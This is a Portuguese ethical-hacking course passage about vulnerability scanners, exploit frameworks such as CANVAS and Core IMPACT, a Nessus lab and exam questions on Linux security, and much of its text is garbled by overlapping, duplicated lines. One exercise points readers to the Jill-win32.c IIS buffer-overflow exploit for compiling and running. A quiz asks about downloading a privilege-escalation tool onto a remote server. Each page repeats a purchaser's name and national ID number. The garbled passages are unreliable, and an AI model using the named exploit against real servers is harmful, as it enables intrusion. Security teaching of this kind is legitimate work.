cuidadosamente revista. CGI é vulnerável na medida em que pode vazar informações do sistema 22
que deve ser mantida em sigilo, e permite que usuários remotos possam executar comandos
inadequados. Whisker exige Perl, por isso, se você estiver indo usá-lo, certifique-se de que você
tem um ambiente apropriado Perl disponível.
N-stealth. Esta é baseada em ferramenta GUI de avaliação de aplicação vem com um extenso banco
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34
AppDetective. Este scanner de nível de aplicativo realiza testes de penetração e auditoria. O Pen
A última
Test categoria
examina o seude
dsist
e scanners é no do
ema a partir nível
nível do sistema.
ponto de vista Estes
de umtipos de scanners
hacker. são versáteis
são
Ela não precisa uma vez
de nenhuma
que podeminterna,
permissão sondar osistemas
sisteste
temas compleotos
completos
consulta e seus
servid or ecomponentes,
tenta recolherem vezmações
vez
infor de aplicações
sobre oindividuais. Um
banco de dados
está em de
scanner execuçã
nível o,
detais
de comopode
sistema a suaser
versã
ser o. O teste
executado emdeum
em auditoria pode detectar
único endereço
endereç o ou uma qualq uer
faixa denúmero de
endereços
eviolações
tambémde pode
pode testar
seguran çaaemeficácia das medidas
seu servidor, de segurança
de falta seguran ça eem
de senhas camadas,
contas como um
como
de usuário sistema
facilment e que
descobertas
corre atrás depara
um ser
um vice packs
firewall. desap
Nessus arecidos
é um bom exemplo
bom e patchesdede
umsegurança.
scanner de nível de sistema.
Embora
Scannersoascanner
Nível dedeSistemas.
nível de sistema não vai sondar o código-fonte de aplicações aplicações individuais, eles
podem varrer redes inteiras
inteiras em busca de uma variedadevariedade de vulnerabilidades.
vulnerabilidades. Ao realizar um
sistema
si stema de hacker ético, scanners de nível nível pode ser usado
usado remotamente. Isto Isto é muito mais
eficiente do que a tentativa de auditar a configuração de cada máquina individual. Scanner de
A últimanão
sistema categoria [Link]
é perfeito.
perfei Eles nãoépodem
no ním
pode velauditar
do sistema.
fontEstes
a fontee dos tipos de scanners
processos que sãosãprestadoras
o versáteis umade vez
que podem
serviços, sondar
e devem
deve sistemas
m contar comcomple tos e seus
as respostas
respostas componentes,
de um serviço paraem
serviço umvez de aplicações
número finito deindividuais.
finito sondas, o queUm
scanner de
significa quenível
todasdeas
sistema
entradas pode ser executado
possíveis não podem
não em umser único endereç
razoavel menteo testadas.
razoavelmente ou uma faixa Scande
Scanners endereços
ners de nível
edetambém
sistemaptambém
ode
ta testar
mbém pode a eficácia das medidas
travar sistemas.
siste de seguran
mas. Muitos ça em
dos testes quecamadas, como umsão
podem executar
podem sistema que
considerados
corre atrásede
perigosos um firewall.
podem desligarNessus
desligar sisteéma.
do [Link] Apesar
bom exemplo de um
de muitas
muitas scanner de
ferramentas denível
deste
ste tipode sistema.
podem realizar
realizar
evasão IDS, eles geralmente
geralmente não são considerados ferramentas ferramentas stealth. Portanto,
Portanto, se o objetivo
objetivo do
Embora
teste de osegurança
scanner
seguran çade nível de
é passar sistema não
despercebi
despercebido,do, vai
umsondar
scannero de
código-fonte
nível de sistema
nível de aplicações
pode não individuais,
ser a melhoreles
podem varrer
escolha uredes
para uma inteiras em busca de uma variedade de vulnerabilidades. Ao realizar um
ma ferramenta.
sistema de hacker ético, scanners de nível pode ser usado remotamente. Isto é muito mais
eficiente do queoa ponto
Provavelmente, tentativa maisdeimportante
auditar aeconfiguração
important de cada
sobre o scanners
scanners máquina
de nível individual.
de sistema é queScanner de são
eles não são
sistema
um não é perfei
substituto to.
para testes
te stesEles não pode
e exames m auditar
mais a fontEles
completos. e dos processos
são que ferramenta
apenas uma são prestadoras no kitdedo
serviços,
hacker e deve
ético. m não
Eles contardevemcomseras rvistos
espostas
vist os comodeoum serviço
único para um número
componente
componente de um testefinte
tes itodedepenetração.
sondas, o que O
significa
seu papelque todasementar
as entradas
é complementar
compl possíveis
outras não podem
ferramentas
ferramentas ser razoavel
e técnicas mente
de testes. testadas.
Código fonte eScan
fonte ners de nível
escaneament
escaneamento o
sistema também
de aplicativo também
também pode
devetravar sistemas. quando
ser utilizados, Muitos
quan do dos testesUma
aplicável. que pavaliação
odemção
avalia executar vulnsão considerados
de vulnerabilidade
erabilidade em
perigosos e podem
profundidade consisdte
consisteesligar do siste
de todos cma. Apesar deque
os componentes
omponentes muinós
tas discutimos.
ferramentas
discuti destepode
mos. Nada tipo substituir
podem realizar
evasão IDS, eles outra
completamente geralmente não são
ferramenta. considerados
Vam
Vamosos agora olharferramenta
para alguns
para s stealth. Portanto,de
dos scanners desenível
o objetiv
mais o do
teste de do
popular seguran ça :é passar despercebido, um scanner de nível de sistema pode não ser a melhor
sistema
sistema:
escolha para uma ferramenta.
23
Provavelmente, o ponto mais importante sobre o scanners de nível de sistema é que eles não são
um substituto para testes e exames mais completos. Eles são apenas uma ferramenta no kit do
hacker ético. Eles não devem ser vistos como o único componente de um teste de penetração. O
seu papel é complementar outras ferramentas e técnicas de testes. Código fonte e escaneamento
de aplicativo também deve ser utilizados, quando aplicável. Uma avaliação de vulnerabilidade em
profundidade consiste de todos os componentes que nós discutimos. Nada pode substituir
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34
Nessus. Um open
open source, compreensivo,
compreensivo, scanner de vulnerabilidade
vulnerabilidade de cross-platform
cross-platform com
Command Line Interface
Interface (CLI) e interface gráfica
gráfica do usuário (GUI). Nessus tem uma
arquitetura cliente / servidor
servidor com clientes disponíveis
disponíveis para UNIX, Linux e Windows e
servidores disponíveis
disponíveis para UNIX, Linux e Windows
Windows (comercial). Nessus é um poderoso,
flexível e ferramenta de varredura de auditoria
auditoria. É preciso um "nada por garantir" de
de
abordagem básica. Por Por exemplo, uma porta
porta aberta não significa necessariament
necessariament
cessariamentee que um
serviço eseja ativo.
ativo. Nessus lhe diz o que está errado e fornece sugestões
sugestões para a fixação de
um determinado problema.
problema. Ele também suporta
suporta vários tipos de plugins, que
que vão desde um
inofensivo para aqueles que podem derrubar um servidor. O menu Plugins Plugins é mostrada na
Figura 5.3.
24
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34
local. A versão mais potente remota deve ser comprada. A página de configuração é
mostrada na Figura 5.4.
NetRecon. Um scanner
scanner comercial produzido
produzido pela Symantec.
Symantec. Ele fornece análise de
vulnerabilidade e identificação.
identificação. Ela tem a capacidade de aprender sobre
sobre a rede, uma
uma vez
que é um escaneador.
escaneador. Como exemplo, se encontra e quebra
quebra uma senha em um um sistema, e
vai tentar a mesma
mesma senha em outros sistemas.
sistemas. O aplicativo possui
possui uma interface gráfica, e
sua plataforma de implementaçã
implementaçã
mplementação o é o Windows NT/2000/XP.
Retina. Um produto
produto comercial da eEye
eEye Digital Security.
Security. Ele fornece varredura
varredura de
aplicativos instalados.
vulnerabilidades Então, ele
em sistemas pode gerar
e dispositivos
dispositi umrede.
vos de relatório
Ele éde identificação
rápid
rápido de
o e pode descobrir
vulnerabilidades.
dispositivos com e sem
sem fio. Retina tem
tem uma interface gráfica,
gráfica, e sua plataforma de
implementação é o Windows NT/2000/XP/2003.
NT/2000/XP/2003.
NetRecon. Um scanner comercial produzido pela Symantec. Ele fornece análise de
vulnerabilidade
LANguard. e identificação.
Um scanner
scanner serviçEla
de serviço tem a capacidade
o completo relatadeasaprender
que relata sobretais
informações, asrede,
tai comouma vez de
o nível
que é um escaneador. Como exemplo, se encontra e quebra uma senha em um sistema, e
pacote de serviço de cada máquina,
máquina, patches de segurança,
segurança, as ações abertas,
abertas, portas
vai tentarserviços
abertas, a mesma senha emativo
/ aplicativo outrosnosistemas.
compu O aplicativo
computador,
tador, possui
as principais
principais uma interface
entradas regisgráfica,
de registro,
tro, e
sua plataforma de implementação é o Windows NT/2000/XP.
senhas fracas, usuários e grupos, e mais.
Retina.
VLAD. UmUmscanner
produtode
decomercial da eEye
vulnerabilidad
vulnerabilidade Digital
e de códigoSecurity. Ele
aberto. fornece
Escri to em varredu
Escrito ra de
Perl, Vlad é projetado
projetado
vulnerabilidades em sistemas e dispositivos de rede. Ele é rápido e pode descobrir
para identificar vulnerabilidades
vulnerabilidades no 10 SANS
SANS Top List. Ele foi
foi testado em Linux, OpenBSD e
dispositivos
FreeBSD. com e sem fio. Retina tem uma interface gráfica, e sua plataforma de
implementação é o Windows NT/2000/XP/2003.
Há todos os tipos de
de ferramentas de avaliação de
de vulnerabilidade. Certifique-se
Certifique-se de que você
LANguard. Um scanner de serviço completo que relata as informações, tais como o nível de
compreende as capacidades
capacidades de cada um. Alguns
Alguns das mais importantes
importantes são mostradas aqui:
aqui:
pacote de serviço de cada máquina, patches de segurança, as ações abertas, portas
abertas, serviços / aplicativo ativo no computador, as principais entradas de registro,
senhas fracas, usuários e grupos, e mais.
Nome Plataforma Abilidade
Alerta de exame
Você deve ser capaz de descrever os diferentes tipos de scanners e discutir como cada um é
usado.
Exploit automatizado e Ferramentas de Avaliação.
Objetivo:
Identificar a operação de ferramentas automatizadas de exploração
Embora as ferramentas de avaliação recentemente discutidas podem fazer o seu trabalho trabalho muito
mais fácil, o
Alerta de examepróximo conjunto de ferramentas a ser discutido será ainda mais intrigante. Estas
Estas
ferramentas revelam onde o software de avaliação de vulnerabilidade está dirigido. Ferramentas
como o Nessus
Você deve e outros
ser capaz desempre tiveram
descrever a capacidade
os diferentes tiposdedeintegrar
scannersa verificação,
verificação, avaliação
e discutir acomo
valiação
cadae um é
funções
usado. de relatório. As ferramentas na lista a seguir tomam essa funcionalidade pa
para
ra a próxima
etapa com a integração da capacidade de explorar
explorar uma vulnerabilidade suspeita. Isso mesmo,
essas ferramentas
Exploit automatizadopodem realmente oferecer
e Ferramentas exploração com um clique só. Esta seção discute a
de Avaliação.
ferramenta de exploração Metasploit Framework
Framework gra gratuita,
tuita, e depois passa para a tela, e IMPACT
Core, que são dois produtos comerciais.
Objetivo:
Dica
CANVAS. Uma ferramenta de ataque automatizada e pent test desenvolvida por Dave Aitel da
[Link]. Ela foi escrito em Python, por isso é portátil para Windows e Linux. É uma
ferramenta comercial que pode fornecer ao profissional de segurança uma capacidades de ataque
e penetração. Como Metasploit, não é uma ferramenta tudo-em-um completa. Ela não faz uma
descoberta inicial, de modo que você deve adicionar seus alvos manualmente. É mais limpa e
mais avançada que Metasploit, mas exige que você compre uma licença. No entanto, isso não
fornece atualizações e suporte. No geral, esta é uma ferramenta de primeira linha para alguém
com
Dicaexperiência em avaliação de penetração.
Core IMPACT. Uma avançada suite comercial de ferramentas de testes de penetração. Core
IMPACT é um ponto de maturidade e um clique em exploração automatizada e ferramenta de
avaliação. É um
Praticar o uso dopacote completo
Framework com os passos
de Exploração parado usuárioseu
entender através do processo, a partir de
funcionamento.
escaneamento e continuação até a fase de exploração e controle. Uma característica única do
produto é que ele suporta uma característica conhecida como articulação. Basicamente um
CANVAS. Uma ferramenta de ataque automatizada e pent test desenvolvida por Dave Aitel da
pivoting (giratório) que permite que uma máquina comprometida ser usada para comprometer
[Link]. Ela foi escrito em Python, por isso é portátil para Windows e Linux. É uma
uma outra. Esta
ferramenta ferramenta
comercial é útilfornecer
que pode para todos, desde o iniciante
ao profissional até o profissional
de segurança de segurança.
uma capacidades Dê
de ataque
uma olhada na interface mostrada na Figura 5.6.
e penetração. Como Metasploit, não é uma ferramenta tudo-em-um completa. Ela não faz uma
descoberta inicial, de modo que você deve adicionar seus alvos manualmente. É mais limpa e
mais avançada que Metasploit, mas exige que você compre uma licença. No entanto, isso não
fornece atualizações e suporte. No geral, esta é uma ferramenta de primeira linha para alguém
com experiência em avaliação de penetração.
Core IMPACT. Uma avançada suite comercial de ferramentas de testes de penetração. Core
IMPACT é um ponto de maturidade e um clique em exploração automatizada e ferramenta de
avaliação. É um pacote completo com os passos do usuário através do processo, a partir de 28
escaneamento e continuação até a fase de exploração e controle. Uma característica única do
produto é que ele suporta uma característica conhecida como articulação. Basicamente um
pivoting (giratório) que permite que uma máquina comprometida ser usada para comprometer
uma outra. Esta ferramenta é útil para todos, desde o iniciante até o profissional de segurança. Dê
uma olhada na interface mostrada na Figura 5.6.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34
Resumo
Neste capítulo, você aprendeu sobre o Linux e como ele é um sistema operacional excelente para
testes de segurança. Você também aprendeu que o Linux é um potencial alvo de ataques e,
portanto, também deve ser corrigido e endurecido.
Você também aprendeu a realizar tarefas básicas em um sistema Linux, como adicionar usuários
e senhas de atualização. A importância da segurança da senha foi discutido, e lhe foi dada a
oportunidade de ver a importância de senhas fortes. Você viu que o Linux, semelhante a
Microsoft, exige uma defesa em profundidade para ser realmente seguro. Isso inclui a segurança
física, a segurança da senha, segurança lógica e gerenciamento
gerenciamento de
d e patches
patches para
p ara certificar-se de
que para baixo nível de software está protegido contra vulnerabilidades conhecidas.
Resumo
Em seguida, você aprendeu sobre várias ferramentas de avaliação
avaliação de segurança.
se gurança. As ferramentas
de avaliação de segurança automáticas são valiosas, uma vez que pode testar um grande número
de problemas com rapidez. Estes programas podem ser encontrados como código aberto e
Neste capítulo, você aprendeu sobre o Linux e como ele é um sistema operacional excelente para
aplicações comerciais. Eles são uma ferramenta poderosa nas mãos de hackers éticos e do
testes de segurança. Você também aprendeu que o Linux é um potencial alvo de ataques e,
atacante. Finalmente uma categoria interessante de instrumentos de avaliação foram discutidos os
portanto, também deve ser corrigido e endurecido.
quadros de exploração que agora estão se tornando mais maduros. Estas ferramentas permitem ao
usuário encontrar
Você também uma vulnerabilidade
aprendeu e, básicas
a realizar tarefas em seguida, aponte
em um e clique
sistema para
Linux, explorar.
como Ferramentas
adicionar usuários
como o Core Impact, Metasploit, e do Framework Exploração são exemplos de instrumentos de
e senhas de atualização. A importância da segurança da senha foi discutido, e lhe foi dada a
avaliação automatizadas.
oportunidade de ver a importância de senhas fortes. Você viu que o Linux, semelhante a
Microsoft, exige uma defesa em profundidade para ser realmente seguro. Isso inclui a segurança
Capítulo 5
física, a segurança da senha, segurança lógica e gerenciamento d e patches p ara certificar-se de
que para baixo nível de software está protegido contra vulnerabilidades conhecidas.
Exercícios
Aplique seu conhecimento.
5- Nestaestimado:
Tempo página, você
voc
10êminutos.
verá links para todas as aplicações
aplicações que foram
foram listados no banco de dados
dados. Encontre
o link para servidores
servidores web e clique no link para o aplicativo do IIS.
1- Abra o seu navegador e acesse [Link].
6- Sob o IIS, localize o código
código de exploração
exploração Jill-win32.c. Depois de encontrar
encontrar o código, você pode
pode vê-lo
2- Você vai
clicando nonotar
botãoàvista.
esquerd a da tela
Se você que várias
identificou um ár vores
servidorestão
servidor listadas. ao buffer overflow de impressora
IIS susceptíveis impressora
IPP, esta ferramenta
ferramenta pode ser compilada e executada para aproveitar aproveitar essa vulnerabilidade.
vulnerabilidade.
3- Clique na interface da árvore Exploit online.
7- Continue a explorar o SecurityForest site. Se você voltar para a página página principal, você vai ver que há
4- Esta página
também terá links
um banco para de
de dados aplicações, sistemas
ferramentas sob oelink
sob redes. Clique
árvore nomenta
ferra link aplicações.
ferramenta que lista todas as ferramentas
ferramentas
por categoria.
5- Nesta página, você verá links para todas as aplicações que foram listados no banco de dados. Encontre
8- Porpara
o link fim, clique
servidornoeslink
webExploitation
Exploitation
e clique noFramework
Fra mework
link para [Link]
O Ex
Exploitation
ploitation
do [Link] é semelhante ao bancobanco de
dados Metasploit, exceto
exceto que ele aproveita a enormeenorme quantidade
quantidade de façanhas na árvore de exploração.
exploração.
Um filme
6- Sob está
o IIS, disponí
disponível
localize o vel demonstra
código que aoferramenta
de exploraçã ferra menta em:
Jill-win32.c. Depois de encontrar o código, você pode vê-lo
[Link]
[Link] [Link]/wiki/[Link]/Exploi
[Link]/wiki
clicando no botão vista. /[Link]/Exploitation_Framework_Screen
/[Link]/Exploi
Se você identificou um servidor tation_Framework_Screenshots
tation_Framework_Screen
IIS susceptíveis ao buffershots
overflow de impressora
IPP, esta ferram
A ferramenta enta
par
para pode ser
a baseada emcompilada e executada
Web Browser
Browser para apro
para Windows
Windows veitar
pode ser essa vulnerab
baixada em: ilidade.
7- Continue a explorar o SecurityForest site. Se você voltar para a página principal, você vai ver que há
também um banco de dados de ferramentas sob o link árvore ferramenta que lista todas as ferramentas 30
por categoria.
8- Por fim, clique no link Exploitation Framework. O Exploitation Framework é semelhante ao banco de
dados Metasploit, exceto que ele aproveita a enorme quantidade de façanhas na árvore de exploração.
Um filme está disponível demonstra que a ferramenta em:
[Link]
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:16:02
[Link]/wiki/[Link]
[Link]/wiki/[Link]/Exploitation_
om/wiki/[Link]/Exploitation_Framework_Download
p/Exploitation_Framework_Download..
Framework_Download
3-
5.2Você precisa adicionar
Executando o Servidorum
uNessus
m usuário para o servidor
servidor Nessus. Isto pode
pode ser realizado, digitando Nessus-
adduser do prompt.
Neste exercício, você irá executar o servidor Nessus e olhar para algumas de suas configurações.
4- Depois
Tempo que um 30
estimado: usuári
usuárioo é adicionado, você vai querer começar o daemon
minutos. daemon do servidor Nessus,
digitando o seguinte: / etc / init.d início / nessusd.
1- Iniciar Knoppix STD. Os arquivos de instalação podem ser encontrados no CD ou pode ser baixado a
5- Umadevez
partir que o daemon
daemon é.org
[Link]-std iniciado,
. você pode digitar nessus na linha de comando para iniciar o cliente
Nessus. Você agora será
será solicitado a fazer login
login para Nessus. Digite o nome de usuário e senha que você
2- Abra
criou nouma janela
passo 3. de terminal e certifique-se que você está executando como root. Se não, digite su.
3-
6- Você
Cliqueprecisa
em OKadicionar
páginaude
na página m usuário para
aviso que o servidor
alerta Nessus.
sobre plugins
plug Isto pods.e Esta
ins perigoso ser realizado,
mensagem,
mensagem, digitando Nessus-
basicamente,
adduserque
afirma do alguns
prompt. plugins podem causar alguns servid
plugins servidores
ores para falhar ou travar.
travar. Se você fosse para
executar essa ferramenta
ferramenta em uma rede de produção,
produção, isto é algoalgo que você gostaria de discutir com com a
4- Depois que um
administração usuári
antes o é adicionado,
de tomar
de vocêsobre
uma decisão vai querer começar o daemon do servidor Nessus,
como proceder.
digitando o seguinte: / etc / init.d início / nessusd.
7- Navegue pelos parâmetros
parâmetros disponíveis em em cada guia. Estes incluem:
incluem: Plugins, Prefs, Opções
Opções de
escaneamento,
5- Uma vez que Seleção
Seleçã o Target,
o daemon e do usuário.
é iniciado,usuári o. digitar nessus na linha de comando para iniciar o cliente
você pode
Nessus. Você agora será solicitado a fazer login para Nessus. Digite o nome de usuário e senha que você
criou
8- Sobno [Link], digite
a guia digite o dispositivo de destino
destino que você gostaria
gostaria de escanear. Certifique-se
Certifique-se de que
este é um sistema que você tem permissão para executar uma varredura varredura. Iniciar a avaliação,
avaliação, clicando em
6- Clique
Iniciar em OK na página de aviso que alerta sobre plugins perigosos. Esta mensagem, basicamente,
o Scan.
afirma que alguns plugins podem causar alguns servidores para falhar ou travar. Se você fosse para
9- Na página
executar essade configuraç
configuração
ferra menta em ão de
umaatualizações obter arquivos,
rede de produção, arquivos,
isto é algselecione
o que vocêSim, fazer ode
gostaria download dos
discutir co ma
administração
arquivos antes
de instalação
instala deatualizados
ção tomar uma(recomendado)
decisão sobreo)como
(recomendad proceder.
e clique em Avançar.
Avançar. Você precisa se registrar
registrar para
obter atualizações. Atualizações
Atualizações são de sete dias atrásatrás para não-clientes pagantes.
7- Navegue pelos parâmetros disponíveis em cada guia. Estes incluem: Plugins, Prefs, Opções de
escaneamento,
10 Seleçãoesteja
10-- Após a verificação
verificação Target, e do usuári
concluída, [Link] os resultados. Esta informação
revise informação podepode ser adicionada ao seu
relatório de teste indicando
indicando ter sido um ensaio
ensaio real.
8- Sob a guia de rede, digite o dispositivo de destino que você gostaria de escanear. Certifique-se de que
este
11-
11 - Oépróximo
um sistema
passo
passoquedevocê
umatem permissão
avaliaçã
avaliação para executar
o real seria uma varreedura
patch, endurecer . Iniciar
atualizar siastemas
avaliaçãque
os sistemas o, clicando
foram em
Iniciar o [Link] serem vulneráveis.
encontrados
9- Na página de configuração de atualizações obter arquivos, selecione Sim, fazer o download dos
arquivos de instalação atualizados (recomendado) e clique em Avançar. Você precisa se registrar para
obter atualizações. Atualizações são de sete dias atrás para não-clientes pagantes. 31
10- Após a verificação esteja concluída, revise os resultados. Esta informação pode ser adicionada ao seu
relatório de teste indicando ter sido um ensaio real.
11- O próximo passo de uma avaliação real seria patch, endurecer e atualizar os sistemas que foram
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:16:02
Questões de Preparação
Preparação ao Exame.
A. netstat
B. ls
C. echo
Questões de Preparação ao Exame.
D. os
1. Como pode em uma lista de usuários Linux que processos estão funcionando, se ele suspeita que algo
2-Você foi contratado por Bob Burgers para escanear sua rede em busca de vulnerabilidades. Ele
tenha sido carregado que não for aprovado?
gostaria que você executasse uma verificação em nível de sistema. Qual dos seguintes programas
netstat
você deve usar?
ls
A. Flawfinder
A.
echo
B. N-Stealth
B.
os
C. SARA
C.
D. Whisker
D.
3- Você foi capaz de obter uma janela de terminal aberto em um servidor Linux remoto. Agora Agora
você precisa usar uma linha de comando em um navegador para baixar uma ferramenta de
2-Você foi contratado por Bob Burgers para escanear sua rede em busca de vulnerabilidades. Ele
escalonamento de executasse
gostaria que você privilé[Link]
Qualverificação
dos seguintes vai funcionar?
em nível de sistema. Qual dos seguintes programas
você deve usar?
A. TFTP
A. Flawfinder
B. Lynx
B. N-Stealth
C. Explorer
C. SARA
D. Firefox
D. Whisker
4- Enquanto a mexia com o computador Linux de seu companheiro de quarto, você acessou seu
passwd. Aqui
3- Você foi está de
capaz o que você
obter umaencontrou.
janela de terminal aberto em um servidor Linux remoto. Agora
você precisa usar uma linha de comando em um navegador para baixar uma ferramenta de
root:x:0:0:root:/root:/bin/bash
escalonamento de privilégios. Qual dos seguintes vai funcionar?
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
A. TFTP
Onde está o root da senha?
B. Lynx
A. Nenhuma senha foi definida.
[Link]
C. A senha foi sombreada (Shadow).
D. Firefox 32
root:x:0:0:root:/root:/bin/bash
4- Enquanto a mexia com o computador Linux de seu companheiro de quarto, você acessou seu
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
passwd. Aqui está o que você encontrou.
Onde está o root da senha?
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:16:02
C. A senha não é visível porque você não está logado como root.
D. A senha não é neste arquivo, é no SAM.
5- Qual dos seguintes permitirá que você defina o usuário para acesso completo, o grupo só
de leitura, e todos os outros não têm acesso?
A. chmod 777
B. chroot 777
C. chmod 740
D. chroot 740
C. A senha não é visível porque você não está logado como root.
6- Seu chefe
D. Ade equipe
senha nãolhe pediuarquivo,
é neste para fazer alterações
é no SAM. absolutas para permissões de um arquivo.
Qual dos seguintes seria correto?
5- Qual dos seguintes permitirá que você defina o usuário para acesso completo, o grupo só
[Link]
leitura,a+rwx
e todos os outros não têm acesso?
B. chmod
A. Chmod777
a+rwx
C. 320
B. chroot 777
D. Chmod740
C. chmod 320
6- A.
SeuSystem users
chefe de equipe lhe pediu para fazer alterações absolutas para permissões de um arquivo.
Qual dos seguintes seria correto?
B. Super users
A. chroot a+rwx
C. Guests
B. Chmod a+rwx
D. Normal users
C. chroot 320
8- Você foi explorar os arquivos e estrutura de diretório de servidor Linux novo. Quais são as
entradas do arquivo
D. Chmod 320 / etc hosts / no arquivo registrado?
A. Odos
7- Qual endereço IP, não
seguintes a máscara, e negar
é um grupo de ou permitir
usuário o comunicado.
válido no Linux?
A. B. O endereço
System users IP e o status de endereços aprovados ou negados.
B.C. O endereço
Super users IP, a máscara de sub-rede e ga
gateway
teway padrão.
C. A identificação de grupo.
grupo.
D. Um valor binário.
binário.
A. /etc/hosts
B. O usuário 100 criado.
B. /etc/shadow
C. A identificação de grupo.
C. /etc/passwd
D.D.
Um/etc/[Link]
valor binário.
10- Onde é que um atacante localiza o arquivo de senha do sistema em uma máquina Linux, que é
11-- Nas versões mais modernas de uso
11 uso Linux qual dos seguintes padrões
padrões de senha de criptografia
criptografia por
restrita a raiz e contém senhas criptografadas?
default?
/etc/hosts
A. MD5
/etc/shadow
A. B. DES
/etc/passwd
B.
C. AES
/etc/[Link]
C. Diffie Hellman
D.
11
12---D.
12 Nas
Qualversões mais
tesmodernas
dos seguintes
seguin de us
é um rootkit o Linux
LKM
LKM?? qual dos seguintes padrões de senha de criptografia por
default?
A . Flea
B. T0rm
A. MD5
C. Adore
B. DES
D. Chkroot
C. AES
13- Como pode ajudar a evitar a Tripwire contra cavalos de Tróia e rootkits?
12-D.
Qual dos seguin
Diffie tes é um rootkit LKM?
Hellman
A. Ele ajuda você pegar alterações utilitários de sistema.
A. chmod 746
B. chroot 644
C. chmod 764
D. chroot 746
15- Quais dos seguintes programas podem ser usados para construir uma prisão em torno de um
programa, como o FTP, para evitar que hackers tenham acesso a pastas e arquivos não
autorizados?
leitura e de escrita, e todos os outros para acesso de leitura?
A. Tripwire
A. chmod 746
B. Chmod
B. chroot 644
C. Loadable kernel modules
C. chmod 764
D. Chrooting
D. chroot 746
15- Quais dos seguintes programas podem ser usados para construir uma prisão em torno de um
programa, como o FTP, para evitar que hackers tenham acesso a pastas e arquivos não
autorizados?
A. Tripwire
B. Chmod
D. Chrooting
35